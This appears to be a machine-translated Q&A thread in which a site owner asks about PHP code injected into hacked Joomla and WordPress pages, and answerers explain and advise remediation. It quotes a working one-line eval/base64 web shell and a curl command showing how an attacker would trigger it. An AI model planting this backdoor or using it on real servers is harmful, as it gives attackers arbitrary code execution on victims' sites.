2014-05-12 43 views
0

很抱歉,如果这是错误的地方问这个问题,但我不知道下面的代码会做什么。我经常看到这种代码。我不知道这段代码做什么。在黑客入侵网站后,黑客通常会在joomla和wordpress网站的许多页面中注入这种代码。如果任何人都可以解释代码,那么我将会成为gald。base64_decode注入代码在PHP文件

<?php eval(base64_decode($_POST['na7fe23']));?> 

回答

2

如果有人张贴在该领域“na7fe23”这个脚本PHP代码块,那么发布的代码将您的服务器上执行。

这基本上允许任何人在你的服务器上执行任何PHP脚本,所以你是严重受损。

+0

那么我在哪里可以找到这个na7fe23。是否有任何方法可以删除这些代码和/或扫描程序? – Err0rr

+3

这na7fe23只是一个随机场。有人会在他们的命令行中执行'cUrl http://example.com/yourscript.php'POST'-d na7fe23 = BIGCHUNKOFBASE64ENCODEDPHPCODE'或类似的东西,然后就搞砸了。没有办法检查代码是什么。此外,您无法知道服务器上的其他后门程序是否已创建。我现在要从互联网上拔掉它,基本上重新安装它,然后再将它插回去。根据Web服务器用户的权限,该服务器上的所有内容以及可能在网络的其余部分可能都有危险。 – GolezTrol

+0

我已经拧了。无论如何感谢信息。我真的很感激。再次感谢 :) – Err0rr